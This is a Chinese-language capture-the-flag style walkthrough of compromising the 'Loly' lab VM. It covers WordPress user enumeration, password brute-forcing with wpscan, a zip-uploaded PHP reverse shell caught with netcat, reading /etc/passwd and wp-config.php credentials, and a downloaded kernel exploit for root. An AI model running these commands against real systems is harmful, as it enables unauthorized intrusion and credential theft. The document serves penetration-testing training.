Loly 靶机渗透
Loly 靶机渗透
Loly 靶机,修改主机网络模式为 NAT
1.确定主机 ip
arp-scan -l
2.信息收集
主机、端口、服务版本扫描
扫描结果
| 端口 | 信息 |
|---|---|
| 80/tcp | Nginx 1.10.3((Ubuntu)) |
80 端口网站
就一个页面,其他都点不开 查看源码,没发现什么
网站目录扫描
dirb http://192.168.220.203/
发现 Wordpress 系统,访问网站,http://192.168.220.203/wordpress/
点击“Sample Page”会发现跳转了以下链接
页面无法显示,说明需要本地添加域名 Hosts 执行命令:mousepad /etc/hosts
192.168.220.203 loly.lc
重新访问链接:
http://loly.lc/wordpress/?page_id=2正常显示
根据前面目录扫描,访问后台
但是不知道的账户和密码,尝试弱口令:admin/admin
账户不多
3. 威胁建模与漏洞分析
使用 wordpress 专用扫描器扫描网站
使用 wpscan 扫描网站,枚举用户名
wpscan --url=http://loly.lc/wordpress/ -e u
获取到用户名:loly
使用 wpscan 破解网站密码:
wpscan --url=http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
获取到密码:fernando
账户密码:loly/fernando
登陆后台:http://loly.lc/wordpress/wp-login.php
发现需要验证邮箱,直接跳过,进入后台
4.漏洞利用
利用后台文件上传漏洞获取 shell
寻找后台上传可上传的点,可以发现有一个可以上传的点,支持 zip 文件
将后门文件打包,然后尝试上传
提示已经上传,有一个可以得到文件的目录/banners 但是依然不知道准确的路径,再次查看页面,找到了一个完整的路径
尝试访问:[http://loly.lc/wordpress/wp-content/banners/test.php](http://loly.lc/wordpress/wp-content/banners/test.php)
成功访问
将 kali 中的后门文件复制到当前目录,然后修改文件中的 IP
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.ph
使用 ifconfig 查看本机 IP,一般是网卡 eth0 显示的 IP,然后修改文件
重新打包后门,上传文件,然后访问 尝试访问:
[http://loly.lc/wordpress/wp-content/banners/shell.php](http://loly.lc/wordpress/wp-content/banners/shell.php)
只要显示上面字符串说明文件正常 在 kali 中开启监听:
nc -lvp 1234然后访问 shell 文件
反弹 shell 成功,使用 python 切换为交互式
shell bash python3 -c 'import pty;pty.spawn("/bin/bash")'
查看用户文件:cat /etc/passwd
有一个账户和网站用户名一致,尝试切换账户:su loly
失败
5.权限提升
利用漏洞本地提权失败
查看系统版本和内核版本信息 uname -a lsb_release -a
使用 searchsploit 搜索漏洞:searchsploit ubuntu 16.04
可以发现有很多,寻找一个
拷贝 37292.c 文件到自己的目录,开启 http 服务器
searchsploit -m 45010
python2 -m SimpleHTTPServer 80
在靶机服务器中下载文件,一般切换到/tmp 目录下操作
查看文件获取编译运行命令:
退出查看用命令 q,
然后回车 进行编译:gcc 45010.c -o pwn
编译失败,可能是当前 shell 缺一些库,毕竟是网站 shell,有些库可能没有加载。
信息收集获取用户 shell 再提权成功
网站目录一般在/var/www/html
查看网站目录配置文件:/var/www/html/wordpress/wp-config.php
可以发现一个密码:lolyisabeautifulgirl
再次尝试切换用户名 loly:su loly
成功切换 再次切换到/tmp 目录,尝试编译:gcc 45010.c -o pwn
编译成功,运行程序:./pwn
成功反弹 shell
小结
本节使用了以下工具: arp-scan,nmap,dirb,wpscan,gcc
本节涉及的漏洞:
暴力破解 文件上传 本地提权漏洞
领悟小结:
WebShell 无论是从权限还是支持的程序来看都不够好,还是需要获取用户 shell 或者 root shell。
本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。
